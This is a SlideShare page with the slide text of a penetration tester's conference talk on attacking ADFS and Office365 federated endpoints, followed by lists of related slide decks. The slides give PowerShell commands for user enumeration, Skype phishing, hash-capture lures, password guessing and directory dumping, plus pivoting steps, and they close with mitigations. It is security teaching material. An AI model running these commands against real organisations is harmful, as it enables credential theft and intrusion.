SlideShare a Scribd company logo

Attacking ADFS Endpoints with PowerShell Scripts

Download as PPTX, PDF
Karl Fosaaen
Karl Fosaaen

Attacking ADFS Endpoints with PowerShell Karl Fosaaen - @kfosaaen Active Directory Federation Services (ADFS) has become increasingly popular in the last few years. As a penetration tester, I'm seeing organizations opening themselves up to attacks on ADFS endpoints across the Internet. Manually completing attacks against these endpoints can be tedious. The current native Microsoft management tools are handy, but what if we weaponized them. During this talk, I will show you how to identify domains that support ADFS, confirm email addresses for users of the domain, and help you guess passwords for those users. We'll cover how you can set up your own hosted ADFS domain (on the cheap), and use it to attack other federated domains. On top of that, we'll show you how you can wrap all of the native functionality with PowerShell to automate your attacks. This talk should give penetration testers an overview on how they can start leveraging ADFS endpoints during a penetration test. https://www.derbycon.com/events/attacking-adfs-endpoints-with-powershell/

Technology
1 of 76
Attacking ADFS Endpoints with PowerShell Karl Fosaaen
Introductions • Who am I? ‒Karl Fosaaen • What do I do? ‒Wear lots of hats ‒Pen Testing ‒Password Cracking ‒Social Engineering ‒Blog ‒DEF CON Swag Goon ‒Pinball Repair
Introductions • Hacker Jeopardy Champion
Slides Overview • ADFS Overview • Attack Walkthroughs ‒ Identifying Federated Endpoints ‒ Setting Up Your Test Environment ‒ User Enumeration ‒ Email Validation and Social Engineering Recon ‒ Skype Message Phishing ‒ Dictionary Attacks Against Federated Accounts ‒ Enumeration of Other Federated Domain Users ‒ Pivoting to the Internal Network • Attack Mitigations • Conclusions/Questions
ADFS Overview
ADFS Overview Active Directory Federation Services (AD FS) “is a standards-based service that allows the secure sharing of identity information between trusted business partners (known as a federation) across an extranet.” Source: https://msdn.microsoft.com/en-us/library/bb897402.aspx
ADFS Overview Some Terms: ‒ IdP ‒ SAML ‒ WS-Federation ‒ WS-Trust ‒ ADAL
ADFS Overview Federation can mean many things ‒ Domain to Domain ‒ Domain to Microsoft ‒ Arbitrary meanings based off of forum posts
ADFS Overview Frequently Federated Services • Office365 • Skype for Business • Exchange • Azure AD • SharePoint • Apps in General
Attack Walkthroughs • Identifying Federated Endpoints • Setting Up Your Test Environment • User Enumeration • Email Validation and Social Engineering Recon • Skype Message Phishing • Dictionary Attacks Against Federated Accounts • Enumeration of Other Federated Domain Users • Pivoting to the Internal Network
Identifying Federated Endpoints
Identifying Federated Endpoints Side Note: • Office365 had an Authentication Bypass issue ‒ Insecure SAML assertions ‒ Affected all federated Office365 domains ‒ They called out this method in their blog post Source: http://www.economyofmechanism.com/office365- authbypass.html
Identifying Federated Endpoints • Using Microsoft Online
Identifying Federated Endpoints • Example user check request
Identifying Federated Endpoints • Microsoft’s Responses ‒ Federated Domain ‒ Microsoft Managed Domain
ADFS Overview Diagram of (Managed) O365 federation
ADFS Overview Diagram of (Federated) O365 federation
Identifying Federated Endpoints • Let’s wrap it in a PowerShell script ‒ Federated Domain ‒ Microsoft Managed Domain https://blog.netspi.com/using-powershell-identify-federated-domains/ https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
Identifying Federated Endpoints • Multiple domains at once https://blog.netspi.com/using-powershell-identify-federated-domains/ https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
Identifying Federated Endpoints • Using DNS TXT records
Identifying Federated Endpoints • Using DNS TXT records • Look for the MS=* records
Identifying Federated Endpoints • What about the top 1 million Alexa sites? ‒ 47,455 (4.7%) of the top 1 Million have “ms=ms*” records • DNS can be a pain at a million records *Still better than a million HTTP requests to Microsoft • Other options ‒ ADFS.domain.com ‒ STS.domain.com
Setting Up Your Test Environment
Setting Up Your Test Environment • Basic Overview ‒ Buy/Have a domain ‒ Set up/Purchase Skype for Business* ‒ Install Skype for Business Client* ‒ Install Lync 2013 SDK* ‒ Get the NetSPI PowerShell Modules ‒ Install Azure AD PowerShell module *Note: This is only needed for testing federated Skype for Business
Setting Up Your Test Environment • Buy your domain
Setting Up Your Test Environment • Get hosted Office365 services ‒ Or set up your own server
Setting Up Your Test Environment • Add your domain to the Office365 portal
Setting Up Your Test Environment • Set up your user and enable federation
Setting Up Your Test Environment • Install Skype for Business and the Lync SDK ‒ Requires Visual Studio 2010 for the easiest install https://www.microsoft.com/en-us/download/details.aspx?id=36824
Setting Up Your Test Environment • Login to Skype for Business as your user
Setting Up Your Test Environment • Grab the PowerShell modules from NetSPI • https://github.com/NetSPI/PowerShell/blob/master/Power Skype.ps1 • https://github.com/NetSPI/PowerShell/blob/master/Get- ADFSEndpoint.ps1
Setting Up Your Test Environment • Install the Azure AD PowerShell Module • https://msdn.microsoft.com/en- us/library/azure/jj151815(v=azure.98).aspx
User Enumeration
User Enumeration • We have: ‒ Some Targets/Endpoints ‒ A testing environment • We need: ‒ Some users to attack • Enumerate some users for the organization off of LinkedIn • Use one of the many recon frameworks • Check out the User enumeration work that nyxgeek spoke about on Friday
Email Validation and Social Engineering Recon
Email Validation and SE Recon • Using our federated Skype, we can find information about other federated Skype users • Just open a chat with them
Email Validation and SE Recon • Or we can just chat with these CEOs
Email Validation and SE Recon • Let’s just wrap it with PowerShell instead Get-SkypeStatus -inputFile test_emails.txt | ft -AutoSize
Email Validation and SE Recon
Email Validation and SE Recon Demo • Get-SkypeStatus -inputFile "C:TempLiveAdmins.txt" | ft -AutoSize • It helps if we run it a couple of times…
Email Validation and SE Recon
Email Validation and SE Recon • What about the top 1 million Alexa sites • Of those 47,455 “ms=ms*” records ‒ 45 have “Administrator” accounts that have federated Skype for Business accounts ‒ None of those were actively online during testing… ‒ From nyxgeek: • 38,658 (3.8%) have hostname http://lyncdiscover.domain.com • 486 of 995 unique (Fortune 1000 - 2015) domain names • Note: ‒ Skype doesn’t like opening 2,000+ conversations at a time
Skype Message Phishing
Skype Message Phishing Send-SkypeMessage -email test@example.com -message "What's your password?" Get-SkypeStatus -inputFile 'C:Emails.txt' | Select Email,Status | where Status -Match "Available" | select Email | Send-SkypeMessage …
Email Validation and SE Recon Demo • Get-SkypeStatus -email karl.fosaaen@netspi.com • Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "Hello from Derbycon" • for ($i = 0; $i -lt 10; $i++){Invoke- SendSkypeMessage -email karl.fosaaen@netspi.com -message "Hello $i"}
Email Validation and SE Recon
Email Validation and SE Recon
Email Validation and SE Recon Demo • Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com - message "192.168.1.123test” • Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com - message “www.microsoftsupport.online" • SMB capture/relay running on internal network • UNC works on internal, HRefs work for external • Send this message out to a group, get or relay hashes
Skype Message Phishing • Further Work ‒ Grab a domains worth of phone numbers • Got this working while making these slides… • Should work if you already have creds ‒ Brute-Forcing Skype Creds • Not easy with the Lync SDK • Nyxgeek has some great methods that will be added to PowerSkype
Dictionary Attacks Against Federated Accounts
Dictionary Attacks Against ADFS • Get-ADFSEndpoint gives us the appropriate command to run for the domain ‒ Federated Domain
Dictionary Attacks Against ADFS • Invoke-ADFSSecurityTokenRequest* Invoke-ADFSSecurityTokenRequest -ClientCredentialType UserName -ADFSBaseUri https://adfs.example.com/ -AppliesTo https://adfs.example.com/adfs/services/trust/13/usernamemixed -UserName 'karl.fosaaen‘ -Password 'Winter2016‘ -Domain ‘example.com‘ -OutputType Token -SAMLVersion 2 -IgnoreCertificateErrors https://blogs.msdn.microsoft.com/besidethepoint/2012/10/17/request-adfs-security- token-with-powershell/
Dictionary Attacks Against ADFS • Get-ADFSEndpoint gives us the appropriate command to run for the domain ‒ Microsoft Managed Domain
Dictionary Attacks Against ADFS • Connect-msolservice – AzureAD PS Module
Enumeration of Other Federated Domain Users
Enumeration of Other Domain Users • Not totally necessary, but it can be handy 1. $msolcred = get-credential 2. connect-msolservice -credential $msolcred 3. Get-MsolUser -All | ft –AutoSize • This also works for apps using AzureAD for account management
Enumeration of Other Domain Users • Using the Graph API
Enumeration of Other Domain Users • Using the Graph API $token = Get-GraphAPIToken -TenantName DOMAIN_GOES_HERE Get-GraphData -Token $token -Tenant DOMAIN_GOES_HERE -Resource users ‒ This works for federated and managed domains • Github – https://github.com/NetSPI/PowerShell/blob/master/Get- GraphAPIToken.ps1
Enumeration of Other Domain Users Demo • $token = Get-GraphAPIToken -TenantName microsoftsupport.online • Get-GraphData -Token $token -Tenant microsoftsupport.online -Resource users
Enumeration of Other Domain Users
Enumeration of Other Domain Users • Use Exchange online for non-MS managed domains • If the domain uses Office365, you can connect to it with PowerShell
Enumeration of Other Domain Users • Use Exchange online for non-MS managed domains (1/2) $PWord = ConvertTo-SecureString -String 'Summer2016' -AsPlainText –Force $credentials = New-Object -TypeName "System.Management.Automation.PSCredential " -ArgumentList "test@example.com", $PWord
Enumeration of Other Domain Users • Use Exchange online for non-MS managed domains that have OWA tied to O365 (2/2) Invoke-Command -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection -ScriptBlock {Get-Recipient -ResultSize unlimited} | Export-CSV c:tempemail_users.csv -NoTypeInformation
Enumeration of Other Domain Users
Pivoting to the Internal Network
Pivoting to the Internal Network • Single Factor VPN Example ‒ Enumerated user emails on LinkedIn ‒ Guessed passwords against MSOnline with PowerShell ‒ Enumerated VPN interfaces ‒ Logged in with guessed credentials ‒ GPP -> Local admin on DA system ‒ DCSync • “Store passwords using reversible encryption”
Pivoting to the Internal Network • Other Routes ‒ Single Factor Services • Management Protocols • RDP • SSH • Sharepoint • Terminal Services – Web Based • Citrix • VDI • Etc.
Pivoting to the Internal Network • Malicious OneDrive Documents ‒ Can’t use macros in the online version of excel
Pivoting to the Internal Network • Malicious SharePoint Documents ‒ Same concept as OneDrive, just a different platform ‒ Backdoor a document ‒ Edit pages
Pivoting to the Internal Network • Send messages from OWA or Skype for Business ‒ Autodiscover is handy ‒ People will trust their co-workers • “Can you look over this word doc for me?”
Pivoting to the Internal Network • Attacking Email Accounts ‒ If Autodiscover is enabled, adding an account can be done from anywhere ‒ Email is interesting, but I’d like a shell ‒ This can not be done programmatically with PowerShell (*Easily) ‒ “Malicious Outlook Rules” • Nick Landers – Silent Break Security ‒ “MAPI over HTTP and Mailrule Pwnage” • Etienne - sensepost
Attack Mitigations
Attack Mitigations • Enable Dual factor authentication for external endpoints* *On all channels
Attack Mitigations • Limit federation to trusted domains • Limit exposed services surface area • Monitor your Federated and Azure endpoints • Enforce strong password requirements
Thanks! • My NetSPI Co-workers ‒ QA/Ideas/Suggestions • My NetSPI Management Team ‒ For giving me time to work on this • Jared Bird - @jaredbird ‒ For asking me about federation years ago
Questions Questions? Karl Fosaaen @kfosaaen https://blog.netspi.com https://github.com/netspi http://www.slideshare.net/kfosaaen

Recommended

I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationNikhil Mittal
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat Security Conference
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Troopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can YouTroopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can YouDouglas Bienstock
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 

Recommended

I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationNikhil Mittal
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat Security Conference
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Troopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can YouTroopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can YouDouglas Bienstock
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...CODE BLUE
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Shakacon
 
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE - ATT&CKcon
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021Florian Roth
 
MITRE ATT&CKcon 2018 Keynote: Advancing Infosec, John Lambert, Microsoft
MITRE ATT&CKcon 2018 Keynote: Advancing Infosec, John Lambert, Microsoft MITRE ATT&CKcon 2018 Keynote: Advancing Infosec, John Lambert, Microsoft
MITRE ATT&CKcon 2018 Keynote: Advancing Infosec, John Lambert, Microsoft MITRE - ATT&CKcon
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
Vault 101
Vault 101Vault 101
Vault 101Hazzim Anaya
 
BSides Portland - Attacking Azure Environments with PowerShell
BSides Portland - Attacking Azure Environments with PowerShellBSides Portland - Attacking Azure Environments with PowerShell
BSides Portland - Attacking Azure Environments with PowerShellKarl Fosaaen
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
Neil Saunders (Beamly) - Securing your AWS Infrastructure with Hashicorp Vault
Neil Saunders (Beamly) - Securing your AWS Infrastructure with Hashicorp Vault Neil Saunders (Beamly) - Securing your AWS Infrastructure with Hashicorp Vault
Neil Saunders (Beamly) - Securing your AWS Infrastructure with Hashicorp Vault Outlyer
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryNikhil Mittal
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]RootedCON
 
Ace Up the Sleeve
Ace Up the SleeveAce Up the Sleeve
Ace Up the SleeveWill Schroeder
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsSergey Soldatov
 
Hashicorp Vault ppt
Hashicorp Vault pptHashicorp Vault ppt
Hashicorp Vault pptShrey Agarwal
 
Welcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSWelcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSMike Felch
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security BoundaryWill Schroeder
 
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
GRE Nedir
GRE NedirGRE Nedir
GRE NedirMert Hakki Bingol
 

More Related Content

What's hot

PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...CODE BLUE
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Shakacon
 
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE - ATT&CKcon
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021Florian Roth
 
MITRE ATT&CKcon 2018 Keynote: Advancing Infosec, John Lambert, Microsoft
MITRE ATT&CKcon 2018 Keynote: Advancing Infosec, John Lambert, Microsoft MITRE ATT&CKcon 2018 Keynote: Advancing Infosec, John Lambert, Microsoft
MITRE ATT&CKcon 2018 Keynote: Advancing Infosec, John Lambert, Microsoft MITRE - ATT&CKcon
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
BSides Portland - Attacking Azure Environments with PowerShell
BSides Portland - Attacking Azure Environments with PowerShellBSides Portland - Attacking Azure Environments with PowerShell
BSides Portland - Attacking Azure Environments with PowerShellKarl Fosaaen
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
Neil Saunders (Beamly) - Securing your AWS Infrastructure with Hashicorp Vault
Neil Saunders (Beamly) - Securing your AWS Infrastructure with Hashicorp Vault Neil Saunders (Beamly) - Securing your AWS Infrastructure with Hashicorp Vault
Neil Saunders (Beamly) - Securing your AWS Infrastructure with Hashicorp Vault Outlyer
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryNikhil Mittal
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]RootedCON
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsSergey Soldatov
 
Welcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSWelcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSMike Felch
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security BoundaryWill Schroeder
 

What's hot (20)

PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
 
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
 
MITRE ATT&CKcon 2018 Keynote: Advancing Infosec, John Lambert, Microsoft
MITRE ATT&CKcon 2018 Keynote: Advancing Infosec, John Lambert, Microsoft MITRE ATT&CKcon 2018 Keynote: Advancing Infosec, John Lambert, Microsoft
MITRE ATT&CKcon 2018 Keynote: Advancing Infosec, John Lambert, Microsoft
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
 
Vault 101
Vault 101Vault 101
Vault 101
 
BSides Portland - Attacking Azure Environments with PowerShell
BSides Portland - Attacking Azure Environments with PowerShellBSides Portland - Attacking Azure Environments with PowerShell
BSides Portland - Attacking Azure Environments with PowerShell
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
 
Neil Saunders (Beamly) - Securing your AWS Infrastructure with Hashicorp Vault
Neil Saunders (Beamly) - Securing your AWS Infrastructure with Hashicorp Vault Neil Saunders (Beamly) - Securing your AWS Infrastructure with Hashicorp Vault
Neil Saunders (Beamly) - Securing your AWS Infrastructure with Hashicorp Vault
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active Directory
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
 
Ace Up the Sleeve
Ace Up the SleeveAce Up the Sleeve
Ace Up the Sleeve
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
 
Hashicorp Vault ppt
Hashicorp Vault pptHashicorp Vault ppt
Hashicorp Vault ppt
 
Welcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSWelcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWS
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security Boundary
 

Viewers also liked

DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
State of the Global Mobile Consumer: Connectivity is core
State of the Global Mobile Consumer: Connectivity is coreState of the Global Mobile Consumer: Connectivity is core
State of the Global Mobile Consumer: Connectivity is coreErol Dizdar
 
Model relational
Model relationalModel relational
Model relationallikut101010
 
Vim Cheatsheet penguen-efendi.com
Vim Cheatsheet penguen-efendi.comVim Cheatsheet penguen-efendi.com
Vim Cheatsheet penguen-efendi.comMert Hakki Bingol
 
ISTSEC 2013 - Garibanın APT Tespit Aracı
ISTSEC 2013 - Garibanın APT Tespit AracıISTSEC 2013 - Garibanın APT Tespit Aracı
ISTSEC 2013 - Garibanın APT Tespit AracıBGA Cyber Security
 
Simtech mobil yarış simulatörü platformu
Simtech mobil yarış simulatörü platformuSimtech mobil yarış simulatörü platformu
Simtech mobil yarış simulatörü platformuErol Dizdar
 
DevOps ile Siber Tehditler Karşısında 360 Derece Alan Hakimiyeti
DevOps ile Siber Tehditler Karşısında 360 Derece Alan HakimiyetiDevOps ile Siber Tehditler Karşısında 360 Derece Alan Hakimiyeti
DevOps ile Siber Tehditler Karşısında 360 Derece Alan HakimiyetiBGA Cyber Security
 
Facebook'taki Türk Bankaları
Facebook'taki Türk BankalarıFacebook'taki Türk Bankaları
Facebook'taki Türk BankalarıErol Dizdar
 
Türkiye'de Mobil Tüketiciyi Anlama Mayıs 2013
Türkiye'de Mobil Tüketiciyi Anlama Mayıs 2013Türkiye'de Mobil Tüketiciyi Anlama Mayıs 2013
Türkiye'de Mobil Tüketiciyi Anlama Mayıs 2013Erol Dizdar
 
Yurt dışından getirilen telefonlar e-devlet'ten kayıt edilebilecek
Yurt dışından getirilen telefonlar e-devlet'ten kayıt edilebilecekYurt dışından getirilen telefonlar e-devlet'ten kayıt edilebilecek
Yurt dışından getirilen telefonlar e-devlet'ten kayıt edilebilecekErol Dizdar
 
Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...
Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...
Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...Can K.
 
Turkcell maxi iq
Turkcell maxi iqTurkcell maxi iq
Turkcell maxi iqErol Dizdar
 
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet AraştırmasıISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet AraştırmasıBGA Cyber Security
 
Türkiye Sosyal Medya Pazarlama Trendleri
